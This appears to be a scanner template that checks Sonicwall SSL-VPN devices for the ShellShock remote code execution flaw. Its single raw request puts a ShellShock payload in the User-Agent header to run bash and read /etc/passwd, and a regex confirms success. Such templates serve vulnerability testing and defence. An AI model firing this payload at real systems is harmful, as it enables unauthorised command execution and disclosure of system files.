id: sonicwall-sslvpn-shellshock info: name: Sonicwall SSLVPN ShellShock RCE author: PR3R00T severity: critical reference: | - https://twitter.com/chybeta/status/1353974652540882944 - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ tags: shellshock,sonicwall,rce,vpn requests: - raw: - | GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: {{Hostname}} User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" Accept: */* Accept-Language: en Connection: close matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" part: body - type: status status: - 200